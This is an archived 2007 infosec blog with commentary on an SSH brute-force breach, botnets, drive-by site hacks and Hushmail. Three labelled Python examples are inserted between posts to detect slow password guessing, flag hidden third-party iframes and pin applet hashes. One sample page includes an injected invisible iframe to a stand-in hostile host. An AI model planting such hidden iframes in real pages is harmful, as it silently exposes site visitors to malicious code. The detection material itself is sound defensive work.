Monday, December 24, 2007

fundamentals

before i get started, since i know you ppl can't wait to hear, i've got version 1.1.0 in production, w/ those pesky (known) bugs worked out...

anyway, let's talk fundamentals...

so my fun for today has been as follows... fortune 500 company server which processes credit card transactions has been owned. they, understandably, want to know the scope of the compromise... while digging through trying to figure out exactly what went down and how bad it is, i determine the probable vector...

brute force and/or dictionary ssh compromise...

"lol" i hear you say. "geeze, they must've had a weak ass password..." (ignoring that they allowed ssh root login, sigh) no, actually, it seems their password wasn't terribly weak. i say that because the server had been under sustained attack for at least 4 weeks... ><

the attacker script would try a random number of attempts (say n=2-5) and then wait a random w=60-300 seconds before trying again... presumably to throw off ids's and such....

companies spend all of these dollars on 5 figure boxes and all of this stuff for security... so why are they so averse to paying a sec guy to monitor logs on their production and critical servers? last time i checked, logcheck didn't cost too much, and man they woulda seen this one coming a mile away... ;)
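an added example (mine, not the original post's, and not the attacker's script from the incident): parsing some constructed sshd auth log lines and flagging exactly this low-and-slow pattern per source, plus the alert that matters most, a successful login from a source that was failing before. the burst gap, minimum burst count and minimum span thresholds are my own assumed values.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sshd/syslog lines for the demo (not the incident's real logs).
# 198.51.100.7 guesses root's password low-and-slow: a couple of tries, a pause
# of minutes, repeat, and finally gets in. 203.0.113.9 is an ordinary noisy
# burst that a simple per-minute threshold would already catch.
SAMPLE_LOG = """\
Dec 20 01:02:11 web1 sshd[4101]: Failed password for root from 198.51.100.7 port 40112 ssh2
Dec 20 01:02:13 web1 sshd[4101]: Failed password for root from 198.51.100.7 port 40112 ssh2
Dec 20 01:05:40 web1 sshd[4133]: Failed password for root from 198.51.100.7 port 40250 ssh2
Dec 20 01:05:42 web1 sshd[4133]: Failed password for root from 198.51.100.7 port 40250 ssh2
Dec 20 01:05:45 web1 sshd[4133]: Failed password for root from 198.51.100.7 port 40250 ssh2
Dec 20 01:09:02 web1 sshd[4160]: Failed password for root from 198.51.100.7 port 40377 ssh2
Dec 20 01:09:05 web1 sshd[4160]: Failed password for root from 198.51.100.7 port 40377 ssh2
Dec 20 01:15:30 web1 sshd[4201]: Failed password for root from 198.51.100.7 port 40502 ssh2
Dec 20 01:15:33 web1 sshd[4201]: Failed password for root from 198.51.100.7 port 40502 ssh2
Dec 20 01:15:36 web1 sshd[4201]: Accepted password for root from 198.51.100.7 port 40502 ssh2
Dec 20 01:30:00 web1 sshd[4300]: Accepted password for alice from 192.0.2.10 port 51000 ssh2
Dec 20 02:00:00 web1 sshd[4400]: Failed password for invalid user admin from 203.0.113.9 port 33001 ssh2
Dec 20 02:00:02 web1 sshd[4400]: Failed password for invalid user admin from 203.0.113.9 port 33001 ssh2
Dec 20 02:00:04 web1 sshd[4401]: Failed password for invalid user test from 203.0.113.9 port 33002 ssh2
"""

LINE_RE = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+"
)


@dataclass(frozen=True)
class AuthEvent:
    when: datetime
    accepted: bool
    user: str
    src: str


def parse_auth_log(text, year=2007):
    """Turn syslog-style sshd lines into AuthEvents (syslog lines omit the year)."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        when = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        events.append(AuthEvent(when, m.group(2) == "Accepted", m.group(3), m.group(4)))
    return events


def group_bursts(times, gap):
    """Split timestamps into bursts; a pause longer than gap starts a new burst."""
    bursts = []
    for t in sorted(times):
        if bursts and t - bursts[-1][-1] <= gap:
            bursts[-1].append(t)
        else:
            bursts.append([t])
    return bursts


def find_low_and_slow(events, gap=timedelta(seconds=30), min_bursts=3,
                      min_span=timedelta(minutes=10)):
    """Flag sources whose failures arrive as several small bursts spread over
    time: the pattern a per-minute threshold misses, but a per-source count
    over the whole log window does not."""
    failures = defaultdict(list)
    for e in events:
        if not e.accepted:
            failures[e.src].append(e.when)
    hits = {}
    for src, times in failures.items():
        bursts = group_bursts(times, gap)
        span = max(times) - min(times)
        if len(bursts) >= min_bursts and span >= min_span:
            hits[src] = {"failures": len(times), "bursts": len(bursts),
                         "span_minutes": round(span.total_seconds() / 60, 1)}
    return hits


def find_success_after_failures(events):
    """An accepted login from a source that was failing before is the alert
    that matters most: the guessing may have worked."""
    failed_so_far = defaultdict(int)
    alerts = []
    for e in sorted(events, key=lambda e: e.when):
        if e.accepted:
            if failed_so_far[e.src]:
                alerts.append((e.when, e.src, e.user, failed_so_far[e.src]))
        else:
            failed_so_far[e.src] += 1
    return alerts
```

run `find_low_and_slow(parse_auth_log(SAMPLE_LOG))` and only 198.51.100.7 comes back; the noisy burst from 203.0.113.9 is left to the plain threshold rule that already handles it.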

Thursday, December 13, 2007

/me sighs...

so 1.0.0 has an uber bug, and i'm still at the office working (instead of celebrating)...

bleh... the irony blows...

Wednesday, December 12, 2007

woot for me

that project i've been workin on just rolled from 0.9.13c over to 1.0.0 :D

got a whole queue of post 1.0 work lined up, but it's a great milestone... a big ball of automation and scripting and stuff... anywho, we're gonna be running in production w/ it really soon, so i've gotta implement as much post 1.0 stuff as i can before it gets into true prod (just to avoid patches and updates as much as possible), and i suppose i oughta figure out why it doesn't work w/ ie7... lol...

hopefully this means i'll be spending some time workin on the blackhat talk in the near future...

woot for me!

Wednesday, December 5, 2007

china, modern malware, and common sense

[china]

so schneier keys into an article over at the times online about china doing mass pwnage around the series of tubes... i find it interesting how china has been just flaunting the lack of order and law enforcement across international interconnected networks. i think the first real thing i heard about was Titan Rain, and it has gone on and on since then.

i wonder if china is going to force some type of global agreement on protocols for interfering in internet traffic in the name of security. something requiring the cooperation of ISPs to null route traffic from offending blocks or something... i donno what's gonna happen, but it seems like this can't go on forever, and we've been seeing ISPs arguing to interfere w/ traffic for some time now... i love the EFF, but i wonder if net neutrality is gonna win out or not...

anyway, the most fascinating bit in here (imo) is that a

security expert who has also seen the letter said that among the techniques used by Chinese groups were "custom Trojans", software designed to hack into the network of a particular firm and feed back confidential data


say wot dawg?!? lmao... so this reminds me of back in the day the first time i ever heard of chinese UO farmers who sat and clicked for hours on end to level grind characters and items to sell to players in the states and elsewhere. never before that moment had i imagined these tasks being mass-produced, but in great chinese modern tradition, they made it happen.

so here we have the same. now the idea of the dedicated attacker is tilted sideways. no longer are we talking about a lone hacker or small elite group attacking a singular target of interest for glory or profit... no, this implies a frickin chinese farm of malware authors doing recon, writing malware, and collecting data.

and not just from .govs, but it has moved into the private sector, w/ financials and the like...

personally, i'm amazed that this hasn't been brought to china's attention on a broader and higher political level. i mean, it isn't like they could claim ignorance of private citizens or organized crime doing these attacks when they've invested so heavily into monitoring and controlling the inet traffic flowing throughout their country...


[modern malware]

maybe i'm behind the times, but sunbelt points out malware which looks at user agent to differentiate between mac and windows and sploit accordingly...

anyway, i got a kick outta running across it b/c my very first bit of infosec writing was a paper submitted to a security site (before blogs existed, lol) which kinda talked about this type of thing. basically, i said that future virii wouldn't be the single sploit variety we saw at the time. we'd see virii which contained multiple payloads and attack vectors, would attempt to id the vulns of a host, and would even mb perform privilege escalation attacks. it was all very out there in retrospect, and i'd link to it if i could find it, but the best i've done is a google cache of a table of contents which contains the title of the paper...

anyway, i may have overdone the complexity and imagined it happening sooner than it did, but it seems we're getting there...


[common sense]

ok, i stumbled across this paper talking about span ports versus taps... i don't mean to dog on it, because it is fairly well written and seems pretty accurate, but it irritated me on some level...

it talks about the advent of the SPAN port, and how it was viewed as a great simplification of monitoring traffic flows across a wire... then it goes on to say that SPAN ports aren't all that great... why not? well, because you really can't use them in GB and 10GB environments... and b/c they change frame timing, and error frames often aren't forwarded, and you'll get packet loss if the switch gets overloaded, and some more stuff.

this is kinda lame of me to say, but all of the people i know who have ever wondered if they should use a tap or a SPAN for a given implementation are already aware of at least the basics of most of these issues.

plus, it ignores the fact that running a tap means that i'll be using two ports on my sensor, since every tap i've ever seen ran two outputs to allow for full throughput viewing of TX and RX on the RX of your sensor(s). in some situations, this is a significant downside to a tap. not to mention the fact that a decent 10/100 tap is gonna cost you at least a few hundred bucks (unless the market has changed a lot since i last looked).

also, if my switch is getting overloaded, i've got bigger problems than a few dropped packets to a span port... in my real world experience, most switches tend to hang at 1-2% utilization, and when they go up towards 40+% proc, you're experiencing trouble on your network...

i guess the bit about the article that bugged me was that it didn't seem to attempt to frame the discussion into the real world at all. in reality, there are a ton of enterprise level orgs that don't have anything close to GB inet bandwidth... not to mention the multitudes of mom n pops... similarly, there are tons of enterprise orgs which run internal GB and 10GB links who don't monitor their internal segments w/ IDS or traffic analysis tools. many of these orgs only monitor their ingress/egress points. not to mention the tons of mom n pop shops who don't run GB internally at all.

so i walk away from the article saying "taps are the only real way to go", but the reality is that in many cases dropping your IDS or analysis tool on a span port on the managed switch that the client/customer already owns will do the job great. it'll save them some money, and the org will be more secure. if i'm droppin 10 IDS's in at remote sites, i'm saving them a chunk of change for a small compromise in risk, and in my book, that is a net gain and a good security tradeoff in the real world...

it is a well written article tho...

Monday, December 3, 2007

irc bot archiving

so /. picked up this story about this company which uses irc bots to lurk on irc rooms and record everything everyone says, and then makes it indexable and such...

i am far too lazy to go dig around to prove it, but i don't think these are the first guys in this game... i've been googling solutions to really obscure tech stuff at least 3 or 4 times in the past and i've come upon results which seemed to be irc-ish chatlogs...

basically, the log is just a txt style web page using the familiar irc "username: comment" format... as i scroll through the google cache looking for the highlighted keyword, i'm reading the conversation and it's just ppl chatting about misc stuff... not a page, not a blog, just a record of some conversation which happened to contain keywords that i was searching for and get ranked in the first few pages so i found it...

anyone else seen this?

Sunday, December 2, 2007

props to the beeb

Hello and thanks for the e-mail about the story on the arrest of the NZ teenager hacker (http://news.bbc.co.uk/1/hi/technology/7120251.stm). It was written by the overnight team who, it seems, have only a passing acquaintance with computer terminology. I've updated the story and tried to make it rather more accurate.


and it does indeed look better to me, as all references to spybot have been purged...

Friday, November 30, 2007

the long.... slow.... arm of the law....

ok, this is kinda funny... police "swoop" and catch a teenage hacker who has owned over a million computers and stolen millions of dollars...

yea, you are safer today, because this guy was a "whizzkid kingpin" behind "an international spybot ring"... i mean geeze, he took down an irc chat room b/c they kicked him out once...

(note: i wonder if spybot knows that the media has suddenly co-opted their name and made it synonymous to malware... /me smacks the ignorant ap and bbc tech reporters... sigh... i'm writing the bbc and ap to let them know...)

anyway, so this "very bright and very skilled" kid has been owning the heck outta the tubes... well, from what i gather, he is known for the creatively named "akbot" series of virii...

yes, these dangerous virii variants exploit uber-0days such as MS04-007 and MS04-011... according to sophos, the akbot-a variant was detected right about the beginning of 2006... sooo, that's 1.5 years between the vuln and this mastermind's exploit release... really, he is dangerous... not a script kiddie who copied someone else's code and flipped some bits and got a series of variants named for his handle...

they say the feds thought he was extremely sophisticated, and that he used encryption to avoid AV detection, but this kinda flies in the face of the fact that there are multiple variant detections listed on av sites... i mean, virtually all malware is undetected by AV at some point in time, just b/c almost all AV is sig based... assuming they mean he used a packer/obfuscator like most malware authors...

i know i may be missing a lot of details, but this is what is being reported... i think it speaks to the lack of understanding of the severity of the infosec issues today if none of these articles mention these points...

i mean, one of those articles says "the FBI believes the raid has helped breakup the botnet network". yea, b/c the guy who logged into the IRC control channel isn't logging in anymore, so all of these infected computers have cleaned themselves of their infections? it is such old-world thinking to say "we've arrested the perp, so the crime is over"... how many of these 1,000,000+ infected machines just got akill through a dropper or some other vector, and have other malicious apps running... well, hrmm... since the vuln for this was patched 3 years ago, i'm gonna guess that a lot of em have other infections if they're hit w/ this... ;)

Thursday, November 29, 2007

sooo...

i sent that last box to the bit bucket (retaining a drive copy for further research when life lends me time)...

made some habit and usage improvements... still some room for improvement beyond what i've done for sure... anywho... c'est la vie and all of that...

so i can't believe i didn't think of cracking passwords when i was hearing how the ps3 was rockin out at folding@home...

and looks like jdm is gonna be sad when he has to think up a new idea for his google os app competition... i still haven't figured a good one out yet... only spent like 10 min thinkin about it tho ;)

as for what is taking up most of my time... still the big project @ work... on rev 0.9.3-ish atm... mostly like little details left, and 3 or 4 mid sized hurdles...

i wish i posted sec links i didn't find on digg... sigh... i'm lame ;)

anywho, haven't moved much beyond hello-world on my first attempt at writing a firefox extension... think it'll be cool, but i gotta actually spend time workin on it...

that's it for now!

Thursday, November 15, 2007

/me sighs @ irony

so, as a great addition to my last post, today i come to find i have a malware issue on my windows box... blargh... glad i caught it...

it is a tad embarrassing, and i haven't had time yet to do an in-depth analysis to try to determine the extent of the damage. i've taken the basic steps to stop the bleeding, changed my passwords, and all of that... i've got a damn win box because i game, and then i get all lazy and use it for other things even though i have a perfectly capable nix box...

anyway, i know other sec professionals who i respect who've been owned, so i'm tryin not to let it get me down... who knows if it'll ever come back to haunt me or not... anyway, i'm trying to use it as motivation to improve my setup at home, as well as some of my usage habits... part of the problem is that i do tech all day, and when i get home i'd just rather wrench on things or work on the house or play games... obviously that doesn't cut it, and i need to put in the time to make sure i'm covering my bases at home like i do every day at work... bleh bleh bleh... ><

anyway, here's why this reinforces my point. it looks like this thing came in over layer 7. despite not having the perfect setup, i think i probably do more than the avg user. my win box auto patches and auto reboots. i run av and anti-malware tools. i run no-script in firefox and try to be careful where i go and what i click. and my box still gets owned. imo, this doesn't bode well for the average user.

the very minor preliminary research i've done leads me to lean towards punkbuster running on CoD (the original) being the vector. the things i see correlate to a bit back when i was playing a game and 2 guys started chatting about stuff that made my ears perk up in game... i wish i could remember what they said. anyway, they said something indicating they were about to do something, and then the server we're playin on hoses up. my box starts actin funky, so i kill the connection and bounce my box. i didn't dig any deeper than that at the time (just call me retardo).

anyway, cursory digging and i come to find that punkbuster has a slight history of vulnerabilities. there is a guy out there who is apparently vigorously exploring this app... anyway, it sucks b/c from my understanding, pb runs at a really low level in order to be able to detect cheating. you've gotta be admin to run it, last time i checked (admittedly, a couple years ago), and apparently their app is coded like crap... sigh...

but yea... so none of my security steps kept pb up to date, and it looks like mb that's how i got popped... for what it's worth, running vista might've afforded me some protection b/c it has a better security model than xp, but i'm not even interested in messin w/ vista... from now on, my win box will only be for games, and i'm not gonna do anything else w/ it, and i'm not gonna give it connectivity to data and resources on other machines...

anyway, i'll post if i ever manage to dig any useful information from the traffic captures and forensics i've got on the pwnt box. i'm putting that stuff off at least a week due to work and RW deadlines and pressures.

i'm thinking about writing an app to crawl vulnerability lists grepping for keywords of software that i run... i wonder if that already exists...

Wednesday, November 14, 2007

the post i've been waiting to write

i hope it's not a letdown...

so i recently had a conversation w/ a buddy of mine... he is getting a new gig at a multi-national multi-billion company as a sort of security manager/architect/roadmapper/evangelist type of a thing... congratz to him again btw!

so, while we are talking, we get on the subject of where the heck should he put his efforts? i mean, in an org w/ thousands of hosts, if you are given the task to come in as part of a team w/ a mandate to re-do infosec, where the heck do you start?

my two cents was that you assume machines are going to get owned to shit, so you do two things... first, you segment your data as best you can, to mitigate the damage of inevitable leaks. 2nd, you assume that modern malware will infect you and that the modern "security software industry" won't be able to help you at all, and you do everything you can to separate data and functionality from your OS, so you can blow potentially kitted machines away on a whim...

anywho... we had this abstract conversation about the changing state of infosec... if you look at infosec perceptions vs infosec realities, you see that there is a schism between the two. the mainstream is still caught up in the hacker image of the disgruntled youth in his basement who has you in his sights and is clicking away on his keyboard, executing commands on hosts on your network.

this is what was happening on your network a few years back, but it isn't the primary threat you face today.

today you can get owned every which way from sunday, and the pwner will never notice that he could blackmail you about your 3 illegitimate children. he isn't going to read your email or im conversations. he probably isn't going to notice anything about you unless you trip some software if/then about your online banking acct, if that.

today's blackhat zombie-net operator doesn't care about you. he cares about the number of digits making up his zombie network. hell, you might get owned and not even have a purpose. maybe he'll use you for spam, or maybe for ddos, or maybe cull you for online banking stuff... even he doesn't know yet. he is building a network. he is building it bigger. he is widening the corridors, and adding more lanes...

i had problems explaining this to a previous employer... they were like "we don't handle cash, and we have a low profile. who would attack us?". my response that they had thousands of hosts around the world and many megs of inet bandwidth was met with blank stares. they couldn't wrap their heads around (and/or i failed to communicate) the fact that the currency being traded in blackhat circles had evolved yet again.

infosec is an arms race. as we find effective defense, the attackers find new attacks.

this really begins to suck in corp land. i'm sorry, but those tens of thousands of dollars you spent on firewalls won't protect you from modern vectors. and the tens of thousands of dollars you spent on AV won't protect you from modern malware. and your patch management infrastructure won't protect you from the latest vuln in the jar: protocol.

hell, most of you in corp land aren't doing anything proactive to defend against buffer and stack overflows, and those relatively modern and too-complex-for-joe-user defenses don't help against many modern attacks...

sucks, but it is farkin true. and the worst part is that you don't get much relief on the old stuff. similar to kaminsky saying (at bh/dc) that the best (/worst) part about design bugs is that they come back from the dead, so too do attack vectors. even though your firewall probably won't protect you from phishing, you can't throw it away when you buy a new tool that will.

the modern frontier is the application layer, which anyone reading this post probably has known for quite some time. this is virtually virgin defense territory, and we're seeing many diff types of attacks:

XSS
XSRF
media files that own you or annoy you
trusted web sites that own you
poor cookie/session handling that owns you

ok, so i'm running firefox (which i wish i could set to default for all of my corp users, but they run in-house ie-specific web-apps for business, soooo) with noscript, so i've gotta be safe. except that i always hit some popular site that requires scripting to function properly, and i decide to trust them so i don't need to click something every time i hit the site. oh crap, they get owned, and now i'm unknowingly running an invisible iframe back to some chinese site. it isn't like i'm going to see a defacement or something. look at the recent site hacks, like the myspace alicia keys hack. they try to be subtle and blend in. did you get an official email from myspace warning you that you might have issues since your myspace page links to alicia's? hell no... oh yea, and that one wasn't even a script, it was mostly social engineering...

i mean, how many hosts am i gonna get if i manage to insert a hostile script into (for example) break.com? out of the total staff of break.com, what percentage of employees do you think are worried about security as their primary job? what is the likelihood of an exploited vuln at their site over the next 12 months? say it exists in the wild for 8 hours... how many hosts will you get? 10,000? more? if break.com doesn't get owned in the next 12 months, how many other sites are out there that your users visit? do you allow outbound www? if so, you have a problem...

do you trust your online bank? i've done assessments on some banks, and i can tell you that my idea of security was incorrect. and your bank probably outsources everything having to do w/ money to some external entity that provides an app they use to run their business. that same app is used across many diff branches of banks. did i mention there is no ingress/egress network/transport layer filtering across those links? and if i can write a sploit that works on bank-x, it might work on bank-y or z...

and security is anything but constant. i know a site which looked pretty good. down the road, they overhaul their web server settings, and poof, raw ownage. clients who hit the site w/ scripting enabled were sent to china to run bad bad code. the javascript used cookies and http posts to send heartbeat info back to china to let the operator know the status of their ever growing network. does anyone beyond the few ppl who've seen this application level sploit know it exists? it isn't a major popular site, but the users who hit it number in the thousands. is there a methodology to inform those users that they are at risk? if there was, can we tell them how to scan their boxes to know they are clean? will up-to-date windows patches protect them? will ad-aware get it? spybot? will the owned site owners consider notification in any form??? did you know that xyz bank can get completely owned and probably never publicly say a word about it? not that your money will go away, but just that the integrity of their servers, which you visit and trust, was compromised and that you might be running malicious code...

the brave new world is that hostile domains pop up and drop off the map before commercial security white/black lists can find them. they run traffic over common ports (80), or within accepted protocols (http).
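an added example (mine, not from the post) of what a defender can actually look for in that scenario: a small scanner that walks a page's html and flags iframes that point off-site, that are hidden, or both, which is the invisible-iframe-to-someone-else's-server pattern described above. the page url and the sample html are constructed for the demo; nothing here is a real site.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page for the demo: a trusted site with one legit same-origin
# embed, one visible third-party embed (an ad slot), and one injected
# invisible iframe pointing somewhere else entirely.
SAMPLE_HTML = """
<html><body>
<h1>welcome</h1>
<iframe src="/player?id=42" width="640" height="360"></iframe>
<iframe src="https://ads.example.net/slot/7" width="300" height="250"></iframe>
<p>nothing to see here</p>
<iframe src="http://hostile.example/x.php" width="0" height="0"
        style="display:none"></iframe>
</body></html>
"""


def _is_hidden(attrs):
    """Zero-size or CSS-hidden iframes rarely have a legitimate reason to exist."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    for dim in ("width", "height"):
        raw = attrs.get(dim, "").strip().lower().rstrip("px")
        if raw.isdigit() and int(raw) == 0:
            return True
        m = re.search(dim + r":(\d+)(px)?(;|$)", style)
        if m and int(m.group(1)) == 0:
            return True
    return False


class IframeAuditor(HTMLParser):
    """Collect every iframe that is off-site and/or hidden, with the reasons."""

    def __init__(self, page_url):
        super().__init__()
        self.page_host = urlparse(page_url).hostname
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src", "")
        host = urlparse(src).hostname        # None for relative (same-origin) src
        reasons = []
        if host and host != self.page_host:
            reasons.append("third-party src " + host)
        if _is_hidden(a):
            reasons.append("hidden")
        if reasons:
            self.findings.append({"src": src, "reasons": reasons})


def audit_iframes(page_url, html):
    parser = IframeAuditor(page_url)
    parser.feed(html)
    return parser.findings


def suspicious(findings):
    """The combination worth paging someone over: hidden AND pointing off-site.
    A visible third-party embed is normal; an invisible one is not."""
    return [f for f in findings
            if "hidden" in f["reasons"]
            and any(r.startswith("third-party") for r in f["reasons"])]
```

feed it the html you fetched from a site you let through noscript and `suspicious(...)` gives you the injected frames to chase; it won't catch script-built frames, so it's a cheap first pass, not a substitute for watching where the browser actually connects.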

wow, what a rant... the other main worry is a targeted attacker. there are corps who offer services to spy on specific targets... hell, 5 years ago my infosec prof told me about companies he saw that existed to eavesdrop on cell phones and data-mine trash. these people are out there, and you know what they say about the dedicated attacker, so here's hopin they aren't lookin at you... and hell, if they do, will you know if it is a misunderstanding or an attack?

anyway, i've wasted wayyyy too many electrons on your monitor saying this, but the point is just that if you're admining infosec anywhere today, your biggest threat is your employees running http to the web via port 80 and 443, and currently you probably don't have any reasonable way to protect your org from the myriad of threats you're faced with. i'm not chicken-little, but the state of things is less than optimal atm...

the attackers have shifted, and the defenders need to as well. we need out of the box OS and application design to limit the trouble users can get themselves into. as a wise man i know loves to say, we can't base our defense around hoping that people make good security decisions. we need to get to the point where we don't offer them the option to make bad choices.

gov't snakeoil/fud... sigh...

ok, so unfortunately this article was dugg up...

it says:

two members of the U.K. government intelligence group Serious Organized Crime Agency connected a machine running Windows XP with Service Pack 1 to an unsecured wireless network. The machine was running no antivirus, firewall, or anti-spyware software

ok, what a great start... now, this demo these brit feds did was for small business owners, who in my experience seem to have the infosec bar set pretty low... but, using an os release which was, what, 3 years ago??? and, should i assume that this means that no security patches released after 2004 were applied to this target machine?

and for my next trick, i shall pwn a fbsd 4 server running ssh, sendmail, and an ssl webserver! phear my fed leeetness... sigh...

Mick used a common, open-source exploit-finding tool he had downloaded from the Internet. SOCA asked ZDNet UK not to divulge the name of the tool.

erm, metasploit?

Mick found the IP address of his own computer by using the XP Wireless Network Connection Status dialog box

...

Using a different attack tool, he produced a security report detailing the vulnerabilities found on the system

nessus? back to metasploit for this next one:

Using the attack tool, Mick built a piece of malware in MS-DOS, giving it a payload that would exploit the flaw within a couple of minutes

do you mean a cmd window? cause i kinda doubt even a 1337 govt h4x0r still boots into straight DOS...

well turns out the feds are trying to make a point...

purely to point out that, if a system hasn't had patches, it's a relatively simple matter to hack into it

ahh, brit tax dollars at work... soooo, using this information as a stepping stone, is it fair for me to deduce that said system probably won't boot up without the power cable plugged into an active electrical outlet?...

seriously though, is this the level that we believe infosec has w/ the populace? do we think that we haven't given most people the message that there are real threats out there, many of which are generally solved via windows update? or should i believe that since XP SP2 includes a "firewall" (a burning wall of bricks... quite impressive really... the burning security in the blinky thing scares off most of the germs in the tubes) it is difficult to integrate it into the business environment?

well, it does get worse...

Nick McGrath, head of platform strategy for Microsoft U.K., was surprised by the incident.

"In the demonstration we saw, it was both enlightening and frightening to witness the seeming ease of the attack on the (Windows) computer," said McGrath. "But the computer was new, not updated, and not patched."

ok, well the ms exec knows enough to know that an unpatched windows machine is vulnerable... i guess i can count this as a positive and raise the bar a tad off of the ground... but seriously, if there is _any_ ms exec who doesn't understand that unpatched security vulns can be exploited quickly and easily, then i'll go on the record as saying that whoever is responsible for internal evangelism at MS is utterly failing...

here's a genius idea... do a 10 min web-quiz for the people who run the #(@%&*@% company that makes the OS which runs most desktops on this planet...

oh, and i'd be remiss not to mention cnet and the author of this stellar article (which, btw, is what the nameless masses [who don't yet understand that patching is important] will read to find stuff out about infosec)... i can't believe that the technical prowess demonstrated in the article is what ZD considers appropriate for their infosec presence on the web... this "expert" writes pointless articles about unrealistic security ideas... they should just pick a schneier cryptogram blurb to publish once a month... cheaper and more effective...

i am now officially in a foul mood... sigh...

Saturday, November 10, 2007

hushmail sec foo

ok, so i'm not a hushmail user, but i've been generally aware of them since back in the day...

anyway, this article about them assisting law enforcement by turning over unencrypted copies of emails is kinda interesting. at first glance one might be tempted to see this as a violation of their basic principles, but it doesn't seem like that's the issue...

the premise of HM is that they are just a medium for email crypted in public strong algorithms, and they never control keys, so they can't read the mails even if they want to.

this is yet another story of strong security measures being compromised by usage and design choices because the strong security was inconvenient and/or unwieldy... the workaround they created to become more user-friendly introduced (known) risk into the equation. in the newer easier to use system, they set up the crypto, and so briefly have the keys.

in this case, people using the new methodology were pwnt by law enforcement using legal channels to ask HM to store and use those keys to decrypt the mails. btw, the HM ToS does not protect illegal activity...

the article notes a fairly obvious potential flaw in the high security model as well. in the high sec method, you have to install and exec a java applet (which you get from HM) which does all of the crypto on your box instead of the server. well, if there is malicious code introduced into the applet, HM can gank your keys.

despite this, i think good and intuitive software design can mitigate the risk as well as the inconvenience... if i ever did anything beyond scripting in my basement nowadays (and play CoD4 w000000t!!!!), i'd consider writing a firefox plugin which did the heavy lifting on running the java applet, and also did checksums on the applet to make sure HM doesn't try to send you a modified copy later. functional reverse engineering and/or blackboxing the applet (if it isn't already oss?) would strengthen the whole thing too... poof, risk window of crypto compromise reduced...
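an added example (mine, not hushmail's code and not the plugin from the post) of the checksum idea above: a trust-on-first-use pin store that hashes the applet the first time it is seen and refuses any later download that hashes differently, with an optional out-of-band hash to vet the first copy too. the applet name, the pin file name and the applet bytes are all made up for the demo.

```python
import hashlib
import json
import os
import tempfile


def sha256_hex(blob):
    return hashlib.sha256(blob).hexdigest()


class AppletPinStore:
    """Trust-on-first-use pinning of a downloaded applet's bytes.

    The first copy of each named applet is hashed and remembered; every later
    download must hash to the same value or it is refused. That catches a
    server that starts shipping a modified applet later. It cannot vouch for
    the first copy, which still needs an out-of-band check.
    """

    def __init__(self, path=None):
        # path=None keeps pins in memory only; a path persists them as JSON.
        self.path = path
        self.pins = {}
        if path and os.path.exists(path):
            with open(path) as f:
                self.pins = json.load(f)

    def _save(self):
        if self.path:
            with open(self.path, "w") as f:
                json.dump(self.pins, f, indent=2)

    def check(self, name, blob, published=None):
        """'pinned' on first sight, 'ok' on a match, 'changed' on a mismatch.

        `published` is an optional hash obtained out of band (vendor web page,
        a friend who audited the jar, whatever); if given it must match before
        the copy is pinned, so a bad first copy is caught as well.
        """
        digest = sha256_hex(blob)
        if published is not None and digest != published:
            return "changed"
        pinned = self.pins.get(name)
        if pinned is None:
            self.pins[name] = digest
            self._save()
            return "pinned"
        return "ok" if pinned == digest else "changed"


def run_if_trusted(store, name, blob, launch):
    """Gate execution on the pin check; `launch` is whatever actually runs the applet."""
    status = store.check(name, blob)
    if status == "changed":
        raise RuntimeError(f"{name}: applet bytes differ from the pinned copy; refusing to run")
    launch(blob)
    return status


def demo():
    """First use, a repeat download, a swapped copy, then a fresh process that
    reloads the pins from disk. Returns the check results and the launch count."""
    original = b"constructed applet bytes v1"                    # stands in for the jar
    modified = b"constructed applet bytes v1 + something extra"  # the swapped copy
    launched = []
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "applet_pins.json")
        store = AppletPinStore(path)
        results = [
            run_if_trusted(store, "hush.jar", original, launched.append),
            run_if_trusted(store, "hush.jar", original, launched.append),
        ]
        try:
            run_if_trusted(store, "hush.jar", modified, launched.append)
        except RuntimeError:
            results.append("changed")
        results.append(AppletPinStore(path).check("hush.jar", original))
    return results, len(launched)
```

the pin only tells you the applet hasn't changed since you first saw it; the first copy is still a leap of faith unless you feed `published` from somewhere other than the server handing you the applet.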

geeze, and this isn't even the post i intended to write when i logged in... stay tuned... ;)

Friday, November 2, 2007

bummer M$

when i first saw that MS is examining the javascript spec, i was kinda hopin there'd at least be a mention of security updates... all they seem to imply is embrace and extend... seems like mb part of a future FUD campaign... bummer :(

who knows tho...

in other news

i'm retarded... moving on...

i bumped into trip-codes, which are an interesting route to authentication (but not authorization, right?)...

i wonder if you could build out a public infrastructure similar to pool.ntp.org and/or openid that allows for salted trips useful over multiple sites...

i'm still neck-deep in scripting, automation, design, etc... doin lots of stuff on the fly, tryin to keep my eye on the prize... gettin closer...

Sunday, October 21, 2007

screw the backlog [psyop post]

ok, i'm skippin all the crap holdin me back, and movin on to this one...

there's a story that got dugg up recently.

anyway, it says that iran is going to put a 17 year old girl to death for defending herself against 3 rapists. to me, this sounds like a horrible thing, but it has something to do w/ iran, so i'm curious. i check out the 'blog' that runs the story. i hit previous stories a few times and it looks kinda normalish liberal blog. i drop 5 and 10 pages back and it starts to look a little more weird. well how far back does it go? the delay feels like a cgi, and the timing (and content) of the posts just looks a little weird to me:



*SNIP* (yea, dh is a totally legit webhost, and i'm a retard... like it says in pi, look for a pattern and you'll see it everywhere ;)

oh, and btw, got an idea (completely unrelated to this crap) for my next bh talk submission.... it is stickin w/ visual analysis of data, and may be an opportunity for some coding kung foo for peeps who are interested... will have to post more on that...

Thursday, October 18, 2007

sux!



i have been swamped w/ stuff and have a huge queue of backlogged articles and reading...

Monday, October 1, 2007

long time no post

been super busy... been workin @ home, which is new for me... took a bit to get used to it, but now i'm pumpin out code... speaking of, time for props to my homie for doin a good job on the wheel i'm reinventing (b/c i somehow lost my backup copy... sigh)...

